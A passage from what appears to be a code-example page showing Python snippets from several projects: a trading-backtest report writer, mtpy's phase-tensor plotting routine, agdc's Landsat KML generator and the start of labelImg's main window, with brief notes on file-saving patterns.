    start_date = fund_ts.index[0].strftime("%m/%d/%Y")
    end_date = fund_ts.index[-1].strftime("%m/%d/%Y")
    ostream.write("Performance Summary for "\
	 + str(path.basename(name)) + " Backtest\n")
    ostream.write("For the dates " + str(start_date) + " to "\
                                       + str(end_date) + "")

    #parameter section
    if d_trading_params!="":
        ostream.write("\n\nTrading Parameters\n\n")
        for var in d_trading_params:
            print_line(var, d_trading_params[var],ostream=ostream)
    if d_hedge_params!="":
        ostream.write("\nHedging Paramaters\n\n")
        if type(d_hedge_params['Weight of Hedge']) == type(float):
            d_hedge_params['Weight of Hedge'] = str(int(d_hedge_params['Weight of Hedge']*100)) + '%'
        for var in d_hedge_params:
            print_line(var, d_hedge_params[var],ostream=ostream)

    #comment section
    if s_comments!="":
        ostream.write("\nComments\n\n%s" % s_comments)


    if directory != False :
        ostream.write("\n\n<img src="+splot+" width=700 />\n\n")

    mult = i_start_cash/fund_ts.values[0]


    timeofday = dt.timedelta(hours = 16)
    timestamps = du.getNYSEdays(fund_ts.index[0], fund_ts.index[-1], timeofday)
    dataobj =de.DataAccess('mysql')
    years = du.getYears(fund_ts)
    benchmark_close = dataobj.get_data(timestamps, benchmark, ["close"], \
                                                     verbose = False)[0]
    for bench_sym in benchmark:
        benchmark_close[bench_sym]=benchmark_close[bench_sym].fillna(method='pad')
        benchmark_close[bench_sym]=benchmark_close[bench_sym].fillna(method='bfill')
        benchmark_close[bench_sym]=benchmark_close[bench_sym].fillna(1.0)

    if type(lf_dividend_rets) != type(0.0):
        for i,sym in enumerate(benchmark):
            benchmark_close[sym] = _dividend_rets_funds(benchmark_close[sym], lf_dividend_rets[i])

    ostream.write("Resulting Values in $ with an initial investment of "+ locale.currency(int(round(i_start_cash)), grouping=True) + "\n")

    print_line(s_formatted_fund_name+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(fund_ts.values[-1]*mult)), grouping=True), \
                                                     float(100*((fund_ts.values[-1]/fund_ts.values[0])-1))), i_spacing=4, ostream=ostream)

    # if type(original)!=type("str"):
    #     mult3 = i_start_cash / original.values[0]
    #     # print_line(s_formatted_original_name +" Resulting Value",(locale.currency(int(round(original.values[-1]*mult3)), grouping=True)),i_spacing=3, ostream=ostream)
    #     print_line(s_formatted_original_name+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(original.values[-1]*mult3)), grouping=True), \
    #                                                  float(100*((original.values[-1]/original.values[0])-1))), i_spacing=4, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            mult3 = i_start_cash / original[i].values[0]
            # print_line(s_formatted_original_name +" Resulting Value",(locale.currency(int(round(original[i].values[-1]*mult3)), grouping=True)),i_spacing=3, ostream=ostream)
            print_line(s_formatted_original_name[i]+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(original[i].values[-1]*mult3)), grouping=True), \
                                                     float(100*((original[i].values[-1]/original[i].values[0])-1))), i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        mult2= i_start_cash / benchmark_close[bench_sym].values[0]
        # print_line(bench_sym+" Resulting Value",locale.currency(int(round(benchmark_close[bench_sym].values[-1]*mult2)), grouping=True),i_spacing=3, ostream=ostream)
        print_line(bench_sym+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(benchmark_close[bench_sym].values[-1]*mult2)), grouping=True), \
                                                     float(100*((benchmark_close[bench_sym].values[-1]/benchmark_close[bench_sym].values[0])-1))), i_spacing=4, ostream=ostream)

    ostream.write("\n")

    # if len(years) > 1:
    print_line(s_formatted_fund_name+" Sharpe Ratio","%10.3f" % fu.get_sharpe_ratio(fund_ts.values)[0],i_spacing=4, ostream=ostream)
    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Sharpe Ratio","%10.3f" % fu.get_sharpe_ratio(original[i].values)[0],i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        print_line(bench_sym+" Sharpe Ratio","%10.3f" % fu.get_sharpe_ratio(benchmark_close[bench_sym].values)[0],i_spacing=4,ostream=ostream)
    ostream.write("\n")


    # KS - Similarity
    # ks, p = ks_statistic(fund_ts);
    # if ks!= -1 and p!= -1:
    #     if ks < p:
    #         ostream.write("\nThe last three month's returns are consistent with previous performance (KS = %2.5f, p = %2.5f) \n\n"% (ks, p))
    #     else:
    #         ostream.write("\nThe last three month's returns are NOT CONSISTENT with previous performance (KS = %2.5f, p = %2.5f) \n\n"% (ks, p))


    ostream.write("Transaction Costs\n")
    print_line("Total Commissions"," %15s, %10.2f%%" % (locale.currency(int(round(commissions)), grouping=True), \
                                                  float((round(commissions)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    print_line("Total Slippage"," %15s, %10.2f%%" % (locale.currency(int(round(slippage)), grouping=True), \
                                                     float((round(slippage)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    print_line("Total Short Borrowing Cost"," %15s, %10.2f%%" % (locale.currency(int(round(borrowcost)), grouping=True), \
                                                     float((round(borrowcost)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    print_line("Total Costs"," %15s, %10.2f%%" % (locale.currency(int(round(borrowcost+slippage+commissions)), grouping=True), \
                                  float((round(borrowcost+slippage+commissions)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    ostream.write("\n")

    print_line(s_formatted_fund_name+" Std Dev of Returns",get_std_dev(fund_ts),i_spacing=8, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Std Dev of Returns", get_std_dev(original[i]), i_spacing=8, ostream=ostream)

    for bench_sym in benchmark:
        print_line(bench_sym+" Std Dev of Returns", get_std_dev(benchmark_close[bench_sym]), i_spacing=8, ostream=ostream)

    ostream.write("\n")


    for bench_sym in benchmark:
        print_benchmark_coer(fund_ts, benchmark_close[bench_sym], str(bench_sym), ostream)
    ostream.write("\n")

    ostream.write("\nYearly Performance Metrics")
    print_years(years, ostream)


    s_line=""
    for f_token in get_annual_return(fund_ts, years):
        s_line+=" %+8.2f%%" % f_token
    print_line(s_formatted_fund_name+" Annualized Return",s_line, i_spacing=4, ostream=ostream)


    if type(original)!=type("str"):
        for i in range(len(original)):
            s_line=""
            for f_token in get_annual_return(original[i], years):
                s_line+=" %+8.2f%%" % f_token
            print_line(s_formatted_original_name[i]+" Annualized Return", s_line, i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        s_line=""
        for f_token in get_annual_return(benchmark_close[bench_sym], years):
            s_line+=" %+8.2f%%" % f_token
        print_line(bench_sym+" Annualized Return", s_line, i_spacing=4, ostream=ostream)

    print_years(years, ostream)

    print_line(s_formatted_fund_name+" Winning Days",get_winning_days(fund_ts, years), i_spacing=4, ostream=ostream)


    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Winning Days",get_winning_days(original[i], years), i_spacing=4, ostream=ostream)


    for bench_sym in benchmark:
        print_line(bench_sym+" Winning Days",get_winning_days(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    print_years(years, ostream)

    print_line(s_formatted_fund_name+" Max Draw Down",get_max_draw_down(fund_ts, years), i_spacing=4, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Max Draw Down",get_max_draw_down(original[i], years), i_spacing=4, ostream=ostream)


    for bench_sym in benchmark:
        print_line(bench_sym+" Max Draw Down",get_max_draw_down(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    print_years(years, ostream)


    print_line(s_formatted_fund_name+" Daily Sharpe Ratio",get_daily_sharpe(fund_ts, years), i_spacing=4, ostream=ostream)


    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Daily Sharpe Ratio",get_daily_sharpe(original[i], years), i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        print_line(bench_sym+" Daily Sharpe Ratio",get_daily_sharpe(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    print_years(years, ostream)

    print_line(s_formatted_fund_name+" Daily Sortino Ratio",get_daily_sortino(fund_ts, years), i_spacing=4, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Daily Sortino Ratio",get_daily_sortino(original[i], years), i_spacing=4, ostream=ostream)


    for bench_sym in benchmark:
        print_line(bench_sym+" Daily Sortino Ratio",get_daily_sortino(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    ostream.write("\n\n\nCorrelation and Beta with DJ Industries for the Fund ")

    print_industry_coer(fund_ts,ostream)

    ostream.write("\n\nCorrelation and Beta with Other Indices for the Fund ")

    print_other_coer(fund_ts,ostream)

    ostream.write("\n\n\nMonthly Returns for the Fund %\n")

    print_monthly_returns(fund_ts, years, ostream)

    if type(ts_turnover) != type("False"):
        ostream.write("\n\nMonthly Turnover for the fund\n")
        print_monthly_turnover(fund_ts, years, ts_turnover, ostream)

    ostream.write("\n\n3 Month Kolmogorov-Smirnov 2-Sample Similarity Test\n")

    print_monthly_ks(fund_ts, years, ostream)

    ks, p = ks_statistic(fund_ts);
    if ks!= -1 and p!= -1:
        ostream.write("\nResults for the Similarity Test over last 3 months : (KS = %2.5f, p = %2.5f) \n\n"% (ks, p))

    if directory != False:
        ostream.write("</pre>")

Example 115

Project: mtpy
Source File: ptplot.py
View license
    def plotAll(self,xspacing=6,esize=5,save='n',fmt='pdf',
                fignum=1,thetar=0):
        """plotAll will plot phase tensor, strike angle, min and max phase angle, 
        azimuth, skew, and ellipticity as subplots on one plot.  Save='y' if you 
        want to save the figure with path similar to input file or Save=savepath
        if you want to define the path yourself.  fmt can be pdf,eps,ps,png,
        svg. Fignum is the number of the figure."""
        
        stationstr=self.z[0].station
        stationlst=[]
        #Set plot parameters
        plt.rcParams['font.size']=8
        plt.rcParams['figure.subplot.left']=.07
        plt.rcParams['figure.subplot.right']=.98
        plt.rcParams['figure.subplot.bottom']=.08
        plt.rcParams['figure.subplot.top']=.95
        plt.rcParams['figure.subplot.wspace']=.2
        plt.rcParams['figure.subplot.hspace']=.4
        
        fs=8
        tfs=10
        #begin plotting
        fig=plt.figure(fignum,[8,10],dpi=150)
        for dd in range(len(self.z)):
            #get phase tensor information
            pt=self.z[dd].getPhaseTensor(thetar=thetar)
            zinv=self.z[dd].getInvariants(thetar=thetar)
            tip=self.z[dd].getTipper(thetar=thetar)
            period=self.z[dd].period
            n=len(period)
            stationlst.append(self.z[dd].station)
            if dd!=0:
                stationstr+=','+self.z[dd].station
            else:
                pass

            
            #plotPhaseTensor
            ax1=plt.subplot(3,1,1,aspect='equal')
            for ii in range(n):
                #make sure the ellipses will be visible
                scaling=esize/pt.phimax[ii]
                eheight=pt.phimin[ii]*scaling
                ewidth=pt.phimax[ii]*scaling
                    
                #create an ellipse scaled by phimin and phimax and oriented along
                #the azimuth    
                ellip=Ellipse((xspacing*ii,0),width=ewidth,
                              height=eheight,
                              angle=pt.azimuth[ii])
                ax1.add_artist(ellip)
                
                if pt.phimin[ii]<0 or pt.phimin[ii]=='nan':
                    cvars=0
#                    print 'less than 0 or nan',cvars
                else:
                    cvars=(pt.phimin[ii]/(np.pi/2))
#                    print 'calculated ',cvars
                    if cvars>1.0:
                        cvars=0
#                        print 'greater than 1 ',cvars
#                print cvars
                    
                ellip.set_facecolor((1,1-cvars,.1))
            
            xticklabels=['%2.2g' % period[ii] for ii in np.arange(start=0,stop=n,
                         step=3)]
            plt.xlabel('Period (s)',fontsize=8,fontweight='bold')
            #plt.title('Phase Tensor Ellipses for '+stationstr,fontsize=14)
            plt.xticks(np.arange(start=0,stop=xspacing*n,step=3*xspacing),
                       xticklabels)
            ax1.set_ylim(-1*(xspacing+3),xspacing+3)
            ax1.set_xlim(-xspacing,n*xspacing+3)
            plt.grid()
            if dd==0:
                ax1cb=make_axes(ax1,shrink=.3,orientation='horizontal',pad=.30)
                cb=ColorbarBase(ax1cb[0],cmap=ptcmap,
                                norm=Normalize(vmin=min(pt.phiminang),
                                               vmax=max(pt.phiminang)),
                                orientation='horizontal')
                cb.set_label('Min Phase')
        
            if len(stationlst)>1:
                plt.legend(stationlst,loc=0,markerscale=.4,borderaxespad=.05,
                       labelspacing=.1,handletextpad=.2)
                leg=plt.gca().get_legend()
                ltext=leg.get_texts()  # all the text.Text instance in the legend
                plt.setp(ltext, fontsize=10)    # the legend text fontsize
        
            
            #plotStrikeAngle
            
            az=90-np.array(pt.azimuth)
            azvar=np.array(pt.azimuthvar)
            realarrow=tip.magreal
            realarrowvar=np.zeros(len(realarrow))+.00000001
            
            ax2=plt.subplot(3,2,3)
            erxy=plt.errorbar(period,zinv.strike,
                              marker=self.pcmlst[dd][0],ms=4,mfc='None',
                              mec=self.pcmlst[dd][1],mew=1,ls='None',
                              yerr=zinv.strikeerr,
                              ecolor=self.pcmlst[dd][1])
            eraz=plt.errorbar(period,az,marker=self.pcmlst[dd+1][0],ms=4,
                              mfc='None',mec=self.pcmlst[dd+1][1],mew=1,
                              ls='None',yerr=azvar,ecolor=self.pcmlst[dd+1][1])
            #ertip=plt.errorbar(period,realarrow,marker='>',ms=4,mfc='None',mec='k',
            #                   mew=1,ls='None',yerr=realarrowvar,ecolor='k')
            plt.legend((erxy[0],eraz[0]),('Strike','Azimuth'),loc=0,
                       markerscale=.2,borderaxespad=.01,labelspacing=.1,
                       handletextpad=.2)
            leg = plt.gca().get_legend()
            ltext  = leg.get_texts()  # all the text.Text instance in the legend
            plt.setp(ltext, fontsize=6)    # the legend text fontsize
    
            
            ax2.set_yscale('linear')
            ax2.set_xscale('log')
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),
                     xmin=10**(np.floor(np.log10(period[0]))))
            plt.ylim(ymin=-200,ymax=200)
            plt.grid(True)
            #plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('Angle (deg)',fontsize=fs,fontweight='bold')
            plt.title('Strike Angle, Azimuth',fontsize=tfs,
                      fontweight='bold')
            
            #plotMinMaxPhase
            
            minphi=pt.phiminang
            minphivar=pt.phiminangvar
            maxphi=pt.phimaxang
            maxphivar=pt.phimaxangvar
    
            ax3=plt.subplot(3,2,4,sharex=ax2)
            ermin=plt.errorbar(period,minphi,marker=self.pcmlst[dd][0],ms=4,
                               mfc='None',mec=self.pcmlst[dd][1],mew=1,ls='None',
                               yerr=minphivar,ecolor=self.pcmlst[dd][1])
            ermax=plt.errorbar(period,maxphi,marker=self.pcmlst[dd+1][0],ms=4,
                               mfc='None',mec=self.pcmlst[dd+1][1],mew=1,
                               ls='None',yerr=maxphivar,
                               ecolor=self.pcmlst[dd+1][1])
            ax3.set_xscale('log')
            ax3.set_yscale('linear')
            plt.legend((ermin[0],ermax[0]),('$\phi_{min}$','$\phi_{max}$'),
                       loc='upper left',markerscale=.2,borderaxespad=.01,
                       labelspacing=.1,handletextpad=.2)
            leg = plt.gca().get_legend()
            ltext  = leg.get_texts()  # all the text.Text instance in the legend
            plt.setp(ltext, fontsize=6.5)    # the legend text fontsize
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),
                     xmin=10**(np.floor(np.log10(period[0]))))
            plt.ylim(ymin=0,ymax=90)
            plt.grid(True)
            #plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('Phase (deg)',fontsize=fs,fontweight='bold')
            plt.title('$\mathbf{\phi_{min}}$ and $\mathbf{\phi_{max}}$',fontsize=tfs,
                      fontweight='bold')

            
            #plotSkew
            
            skew=pt.beta
            skewvar=pt.betavar
    
            ax5=plt.subplot(3,2,5,sharex=ax2)
            erskew=plt.errorbar(period,skew,marker=self.pcmlst[dd][0],ms=4,
                                mfc='None',mec=self.pcmlst[dd][1],mew=1,
                                ls='None',yerr=skewvar,
                                ecolor=self.pcmlst[dd][1])
            ax5.set_xscale('log')
            ax5.set_yscale('linear')
            ax5.yaxis.set_major_locator(MultipleLocator(10))
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),xmin=10**(
                                np.floor(np.log10(period[0]))))
            plt.ylim(ymin=-45,ymax=45)
            plt.grid(True)
            plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('Skew Angle (deg)',fontsize=fs,fontweight='bold')
            plt.title('Skew Angle',fontsize=tfs,fontweight='bold')
            
            #plotEllipticity
            
            ellipticity=pt.ellipticity
            ellipticityvar=pt.ellipticityvar
    
            ax6=plt.subplot(3,2,6,sharex=ax2)
            erskew=plt.errorbar(period,ellipticity,marker=self.pcmlst[dd][0],
                                ms=4,mfc='None',mec=self.pcmlst[dd][1],mew=1,
                                ls='None',yerr=ellipticityvar,
                                ecolor=self.pcmlst[dd][1])
            ax6.set_xscale('log')
            ax6.set_yscale('linear')
            ax6.yaxis.set_major_locator(MultipleLocator(.1))
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),
                     xmin=10**(np.floor(np.log10(period[0]))))
            plt.ylim(ymin=0,ymax=1)
            #plt.yticks(range(10),np.arange(start=0,stop=1,step=.1))
            plt.grid(True)
            plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('$\mathbf{\phi_{max}-\phi_{min}/\phi_{max}+\phi_{min}}$',
                       fontsize=fs,fontweight='bold')
            plt.title('Ellipticity',fontsize=tfs,fontweight='bold')
            #plt.suptitle(self.z.station,fontsize=tfs,fontweight='bold')
        plt.suptitle('Phase Tensor Elements for: '+stationstr,fontsize=12,
                     fontweight='bold')
            
        if save=='y':
            if not os.path.exists(self.savepath):
                os.mkdir(self.savepath)
                print 'Made Directory: '+ self.savepath
            fig.savefig(os.path.join(self.savepath,
                                     self.z[0].station+'All.'+fmt),
                        fmt=fmt)
            print 'Saved figure to: '+os.path.join(self.savepath,
                                               self.z[0].station+'All.'+fmt)
            plt.close()
        elif len(save)>1:
            fig.savefig(os.path.join(save,self.z[0].station+'All.'+fmt),
                        fmt=fmt)
            print 'Saved figure to: '+os.path.join(save,
                                               self.z[0].station+'All.'+fmt)
            plt.close()
        elif save=='n':
            pass
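
Saving the figure in plotAll uses the same check-then-create pattern: os.path.exists decides whether os.mkdir is needed before fig.savefig writes into self.savepath. A stripped-down sketch with a hypothetical save_figure helper instead of the ptplot class state:

import os

def save_figure(fig, save_dir, filename):
    # Create the save directory on first use, then write the figure
    # into it and return the full path, much as plotAll reports above.
    if not os.path.exists(save_dir):
        os.mkdir(save_dir)
    target = os.path.join(save_dir, filename)
    fig.savefig(target)
    return target

# Usage (assuming `fig` is an existing matplotlib figure):
# print(save_figure(fig, "figures", "stationAll.pdf"))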

Example 116

Project: agdc
Source File: scene_kml_generator.py
View license
    def generate(self, kml_filename=None, wrs_shapefile='WRS-2_bound_world.kml'):
        '''
        Generate a KML file
        '''
        def write_xml_file(filename, dom_tree, save_backup=False):
            """Function write the metadata contained in self._metadata_dict to an XML file
            Argument:
                filename: Metadata file to be written
                uses_attributes: Boolean flag indicating whether to write values to tag attributes
            """
            logger.debug('write_file(%s) called', filename)
    
            if save_backup and os.path.exists(filename + '.bck'):
                os.remove(filename + '.bck')
    
            if os.path.exists(filename):
                if save_backup:
                    os.rename(filename, filename + '.bck')
                else:
                    os.remove(filename)
    
            # Open XML document
            try:
                outfile = open(filename, 'w')
                assert outfile is not None, 'Unable to open XML file ' + filename + ' for writing'
    
                logger.debug('Writing XML file %s', filename)
    
                # Strip all tabs and EOLs from around values, remove all empty lines
                outfile.write(re.sub('\>(\s+)(\n\t*)\<',
                                     '>\\2<',
                                     re.sub('(\<\w*[^/]\>)\n(\t*\n)*(\t*)([^<>\n]*)\n\t*\n*(\t+)(\</\w+\>)',
                                            '\\1\\4\\6',
                                            dom_tree.toprettyxml(encoding='utf-8')
                                            )
                                     )
                              )
    
            finally:
                outfile.close()
    
        def get_wrs_placemark_node(wrs_document_node, placemark_name):
            """
            Return a clone of the WRS placemark node with the specified name
            """ 
            try:
                return [placemark_node for placemark_node in self.getChildNodesByName(wrs_document_node, 'Placemark') 
                    if self.getChildNodesByName(placemark_node, 'name')[0].childNodes[0].nodeValue == placemark_name][0].cloneNode(True)
            except:
                return None
                

        
        def create_placemark_node(wrs_document_node, acquisition_info):
            """
            Create a new placemark node for the specified acquisition
            """
            logger.info('Processing %s', acquisition_info['dataset_name'])
            
            wrs_placemark_name = '%d_%d' % (acquisition_info['path'], acquisition_info['row'])
            
            kml_placemark_name = acquisition_info['dataset_name']
            
            placemark_node = get_wrs_placemark_node(wrs_document_node, wrs_placemark_name)
            
            self.getChildNodesByName(placemark_node, 'name')[0].childNodes[0].nodeValue = kml_placemark_name
            
            kml_time_span_node = kml_dom_tree.createElement('TimeSpan')
            placemark_node.appendChild(kml_time_span_node)
            
            kml_time_begin_node = kml_dom_tree.createElement('begin')
            kml_time_begin_text_node = kml_dom_tree.createTextNode(acquisition_info['start_datetime'].isoformat())
            kml_time_begin_node.appendChild(kml_time_begin_text_node)
            kml_time_span_node.appendChild(kml_time_begin_node)
            
            kml_time_end_node = kml_dom_tree.createElement('end')
            kml_time_end_text_node = kml_dom_tree.createTextNode(acquisition_info['end_datetime'].isoformat())
            kml_time_end_node.appendChild(kml_time_end_text_node)
            kml_time_span_node.appendChild(kml_time_end_node)
            
            description_node = self.getChildNodesByName(placemark_node, 'description')[0]
            description_node.childNodes[0].data = '''<strong>Geoscience Australia ARG25 Dataset</strong> 
<table cellspacing="1" cellpadding="1">
    <tr>
        <td>Satellite:</td>
        <td>%(satellite)s</td>
    </tr>
    <tr>
        <td>Sensor:</td>
        <td>%(sensor)s</td>
    </tr>
    <tr>
        <td>Start date/time (UTC):</td>
        <td>%(start_datetime)s</td>
    </tr>
    <tr>
        <td>End date/time (UTC):</td>
        <td>%(end_datetime)s</td>
    </tr>
    <tr>
        <td>WRS Path-Row:</td>
        <td>%(path)03d-%(row)03d</td>
    </tr>
    <tr>
        <td>Bounding Box (LL,UR):</td>
        <td>(%(ll_lon)f,%(lr_lat)f),(%(ur_lon)f,%(ul_lat)f)</td>
    </tr>
    <tr>
        <td>Est. Cloud Cover (USGS):</td>
        <td>%(cloud_cover)s%%</td>
    </tr>
    <tr>
        <td>GCP Count:</td>
        <td>%(gcp_count)s</td>
    </tr>
    <tr>
        <td>
            <a href="http://eos.ga.gov.au/thredds/wms/LANDSAT/%(year)04d/%(month)02d/%(dataset_name)s_BX.nc?REQUEST=GetMap&SERVICE=WMS&VERSION=1.3.0&LAYERS=FalseColour741&STYLES=&FORMAT=image/png&TRANSPARENT=TRUE&CRS=CRS:84&BBOX=%(ll_lon)f,%(lr_lat)f,%(ur_lon)f,%(ul_lat)f&WIDTH=%(thumbnail_size)d&HEIGHT=%(thumbnail_size)d">View thumbnail</a>
        </td>
        <td>
            <a href="http://eos.ga.gov.au/thredds/fileServer/LANDSAT/%(year)04d/%(month)02d/%(dataset_name)s_BX.nc">Download full NetCDF file</a>
        </td>
    </tr>
</table>''' % acquisition_info
            
            return placemark_node
            
            
        kml_filename = kml_filename or self.output_file
        assert kml_filename, 'Output filename must be specified'
        
        wrs_dom_tree = xml.dom.minidom.parse(wrs_shapefile)
        wrs_document_element = wrs_dom_tree.documentElement
        wrs_document_node = self.getChildNodesByName(wrs_document_element, 'Document')[0]
        
        kml_dom_tree = xml.dom.minidom.getDOMImplementation().createDocument(wrs_document_element.namespaceURI, 
                                                                             'kml', 
                                                                             wrs_dom_tree.doctype)
        kml_document_element = kml_dom_tree.documentElement
        
        # Copy document attributes
        for attribute_value in wrs_document_element.attributes.items():
            kml_document_element.setAttribute(attribute_value[0], attribute_value[1])
            
        kml_document_node = kml_dom_tree.createElement('Document')
        kml_document_element.appendChild(kml_document_node)
        
        
        # Copy all child nodes of the "Document" node except placemarks
        for wrs_child_node in [child_node for child_node in wrs_document_node.childNodes 
                               if child_node.nodeName != 'Placemark']:
                                   
            kml_child_node = kml_dom_tree.importNode(wrs_child_node, True)                                   
            kml_document_node.appendChild(kml_child_node)
            
        # Update document name 
        doc_name = 'Geoscience Australia ARG-25 Landsat Scenes'
        if self.satellite or self.sensor:
            doc_name += ' for'
            if self.satellite:
                doc_name += ' %s' % self.satellite
            if self.sensor:
                doc_name += ' %s' % self.sensor
        if self.start_date:
            doc_name += ' from %s' % self.start_date
        if self.end_date:
            doc_name += ' to %s' % self.end_date
            
        logger.debug('Setting document name to "%s"', doc_name)
        self.getChildNodesByName(kml_document_node, 'name')[0].childNodes[0].data = doc_name
         
        # Update style nodes as specified in self.style_dict
        for style_node in self.getChildNodesByName(kml_document_node, 'Style'):
            logger.debug('Style node found')
            for tag_name in self.style_dict.keys():
                tag_nodes = self.getChildNodesByName(style_node, tag_name)
                if tag_nodes:
                    logger.debug('\tExisting tag node found for %s', tag_name)
                    tag_node = tag_nodes[0]
                else:
                    logger.debug('\tCreating new tag node for %s', tag_name)
                    tag_node = kml_dom_tree.createElement(tag_name)
                    style_node.appendChild(tag_node)
                    
                for attribute_name in self.style_dict[tag_name].keys():
                    attribute_nodes = self.getChildNodesByName(tag_node, attribute_name)
                    if attribute_nodes:
                        logger.debug('\t\tExisting attribute node found for %s', attribute_name)
                        attribute_node = attribute_nodes[0]
                        text_node = attribute_node.childNodes[0]
                        text_node.data = str(self.style_dict[tag_name][attribute_name])
                    else:
                        logger.debug('\t\tCreating new attribute node for %s', attribute_name)
                        attribute_node = kml_dom_tree.createElement(attribute_name)
                        tag_node.appendChild(attribute_node)
                        text_node = kml_dom_tree.createTextNode(str(self.style_dict[tag_name][attribute_name]))
                        attribute_node.appendChild(text_node)
    
           
        self.db_cursor = self.db_connection.cursor()
        
        sql = """-- Find all NBAR acquisitions
select satellite_name as satellite, sensor_name as sensor, 
x_ref as path, y_ref as row, 
start_datetime, end_datetime,
dataset_path,
ll_lon, ll_lat,
lr_lon, lr_lat,
ul_lon, ul_lat,
ur_lon, ur_lat,
cloud_cover::integer, gcp_count::integer
from 
    (
    select *
    from dataset
    where level_id = 2 -- NBAR
    ) dataset
inner join acquisition a using(acquisition_id)
inner join satellite using(satellite_id)
inner join sensor using(satellite_id, sensor_id)

where (%(start_date)s is null or end_datetime::date >= %(start_date)s)
  and (%(end_date)s is null or end_datetime::date <= %(end_date)s)
  and (%(satellite)s is null or satellite_tag = %(satellite)s)
  and (%(sensor)s is null or sensor_name = %(sensor)s)

order by end_datetime
;
"""
        params = {
                  'start_date': self.start_date,
                  'end_date': self.end_date,
                  'satellite': self.satellite,
                  'sensor': self.sensor
                  }
        
        log_multiline(logger.debug, self.db_cursor.mogrify(sql, params), 'SQL', '\t')
        self.db_cursor.execute(sql, params)
        
        field_list = ['satellite',
                      'sensor', 
                      'path',
                      'row', 
                      'start_datetime', 
                      'end_datetime',
                      'dataset_path',
                      'll_lon',
                      'll_lat',
                      'lr_lon',
                      'lr_lat',
                      'ul_lon',
                      'ul_lat',
                      'ur_lon',
                      'ur_lat',
                      'cloud_cover', 
                      'gcp_count'
                      ]
        
        for record in self.db_cursor:
            
            acquisition_info = {}
            for field_index in range(len(field_list)):
                acquisition_info[field_list[field_index]] = record[field_index]
                
            acquisition_info['year'] = acquisition_info['end_datetime'].year    
            acquisition_info['month'] = acquisition_info['end_datetime'].month    
            acquisition_info['thumbnail_size'] = self.thumbnail_size   
            acquisition_info['dataset_name'] = re.search('[^/]+$', acquisition_info['dataset_path']).group(0)
            
            log_multiline(logger.debug, acquisition_info, 'acquisition_info', '\t')
                
            placemark_node = create_placemark_node(wrs_document_node, acquisition_info)
            kml_document_node.appendChild(placemark_node)
            
        logger.info('Writing KML to %s', kml_filename)
        write_xml_file(kml_filename, kml_dom_tree)
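
write_xml_file uses os.path.exists twice: once to drop a stale .bck backup and once to decide whether an existing output file should be renamed aside or deleted before the new XML is written. A minimal sketch of just that backup-or-overwrite step, detached from the KML details:

import os

def prepare_output_path(filename, save_backup=False):
    # Remove any stale backup, then either move the current file to
    # <filename>.bck or delete it so a fresh copy can be written.
    backup = filename + '.bck'
    if save_backup and os.path.exists(backup):
        os.remove(backup)
    if os.path.exists(filename):
        if save_backup:
            os.rename(filename, backup)
        else:
            os.remove(filename)
    return filename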

Example 117

Project: labelImg
Source File: labelImg.py
View license
    def __init__(self, filename=None):
        super(MainWindow, self).__init__()
        self.setWindowTitle(__appname__)
        # Save as Pascal voc xml
        self.defaultSaveDir = None
        self.usingPascalVocFormat = True
        if self.usingPascalVocFormat:
            LabelFile.suffix = '.xml'
        # For loading all image under a directory
        self.mImgList = []
        self.dirname = None
        self.labelHist = []
        self.lastOpenDir = None

        # Whether we need to save or not.
        self.dirty = False

        # Enable auto saving when pressing next
        self.autoSaving = True
        self._noSelectionSlot = False
        self._beginner = True
        self.screencastViewer = "firefox"
        self.screencast = "https://youtu.be/p0nR2YsCY_U"

        self.loadPredefinedClasses()
        # Main widgets and related state.
        self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
        self.labelList = QListWidget()
        self.itemsToShapes = {}
        self.shapesToItems = {}

        self.labelList.itemActivated.connect(self.labelSelectionChanged)
        self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
        self.labelList.itemDoubleClicked.connect(self.editLabel)
        # Connect to itemChanged to detect checkbox changes.
        self.labelList.itemChanged.connect(self.labelItemChanged)

        listLayout = QVBoxLayout()
        listLayout.setContentsMargins(0, 0, 0, 0)
        listLayout.addWidget(self.labelList)
        self.editButton = QToolButton()
        self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.labelListContainer = QWidget()
        self.labelListContainer.setLayout(listLayout)
        listLayout.addWidget(self.editButton)#, 0, Qt.AlignCenter)
        listLayout.addWidget(self.labelList)


        self.dock = QDockWidget(u'Box Labels', self)
        self.dock.setObjectName(u'Labels')
